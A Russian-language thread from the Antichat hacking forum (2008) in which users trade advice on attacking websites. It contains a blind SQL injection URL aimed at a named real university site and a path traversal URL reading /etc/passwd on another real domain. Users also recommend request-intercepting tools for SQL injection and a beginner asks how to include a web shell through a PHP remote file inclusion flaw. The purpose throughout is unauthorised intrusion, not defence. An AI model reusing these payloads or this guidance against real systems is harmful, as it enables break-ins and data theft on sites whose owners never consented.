Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
10.12.2008, 00:11
|
|
Познающий
Регистрация: 18.04.2008
Сообщений: 62
Провел на форуме:
279406
Репутация:
37
|
|
Ну это ясно... я где то читал что HTTP заголовок нужно переделывать.. что то в этом роде. А можно пример какой-нибудь.. гугл что то не хочет искать подобное  |
|
|
10.12.2008, 00:24
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Thrasher88
Ну это ясно... я где то читал что HTTP заголовок нужно переделывать.. что то в этом роде. А можно пример какой-нибудь.. гугл что то не хочет искать подобное Качаешь две проги
1) Naviscope
2) InetCrack
Врубаешь 1ую прогу и заходишь на сайт и вбиваешь что либо в уязвимом get. Naviscope перехватывает пакет
Потом врубаешь InetCrack и перехваченный пакет вставляешь туда. И там уже развиваешь скуль)) Удачи!!!
|
|
|
|
10.12.2008, 00:33
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
В идеале если юзаешь firefox, то есть плагин полезный. http://livehttpheaders.mozdev.org/
|
|
|
|
10.12.2008, 00:50
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
помоему проще юзать скрипт мэднета, поищи на madnet.name
да и не факт что будет работать через пост если в скрипте определено что переменная получает значение через гет
$var = $_GET['var']
Последний раз редактировалось Constantine; 10.12.2008 в 23:18..
Причина: как можно так ошибаться?)
|
|
|
|
10.12.2008, 20:35
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865
Репутация:
571
|
|
http://dcmp.bc.edu/news.php?id=433+and+substring(version(),1,1)=3/*
Крути  |
|
|
|
10.12.2008, 22:12
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Нужен человек, который хорошо разбирается в blind sql... Напиши, пожалуйста, в аську... 5703828
|
|
|
|
10.12.2008, 23:36
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Народ, какой аналог команды id (unix) в винде есть? Если таковой есть вообще. Чтобы узнать текущего пользователя / права.
|
|
|
|
11.12.2008, 09:33
|
|
Постоянный
Регистрация: 07.02.2006
Сообщений: 630
Провел на форуме:
12985021
Репутация:
676
|
|
в linux совсем другая система распределения прав.. 
Сообщение от SHS
Чтобы узнать текущего пользователя / права.
в винде когда cmd запускаешь, всегда оказываешся в папке с именем юзера, т.е
D:\Documents and Settings\Admin>
имя можно еще так узнать:
Код:
D:\Documents and Settings\Admin>%username%
"Admin" не является внутренней или внешней
командой, исполняемой программой или пакетным файлом.
Права на файлы можно командой ATTRIB посмотреть...
Последний раз редактировалось aka PSIH; 11.12.2008 в 09:52..
|
|
|
|
11.12.2008, 10:14
|
|
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941
Репутация:
2
|
|
Поповоду D:\Documents and Settings\Admin>
У меня не тот случай, я через скуль. А в остальном спасиб, помогло.
|
|
|
|
11.12.2008, 14:04
|
|
Новичок
Регистрация: 24.09.2008
Сообщений: 12
Провел на форуме:
65637
Репутация:
0
|
|
сорри совсем за нубовские вопросы, но все же ... читаю-читаю, но пока многого не догоняю
вот допустим нашел я пхп инъекцию ( http://сайт/index.php?p=http://google.com )
ага, гугля отображается ... что дальше? вгружаем шелл.
на сервак залил файл шелла и пытаюсь инклудить
1) http://сайт/index.php?p=http://шелл.php - шел открывается, но показывает мой сервак ... получается скрипт выполняется на моем серваке!? и зачем мне это?
2) пробудем так (где-то читал) http://сайт/index.php?p=http://шелл.txt
тупо в окне браузера выдает содержание txt'шного файла ... так как же все-таки заинклудить шелл?
И еще вопросец:
Почему уязвиость вида
http://www.pep.spb.org/index.php?p=../../../../../../../../../../../../../etc/passwd
называют PHP - include'ом и вообще какой от нее толк? Пассов же там нет никаких ... А что мы можем, просто узнав, какие файлы на серваке??
Всем заранее спасибо, прошу сильно меня не пинать |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
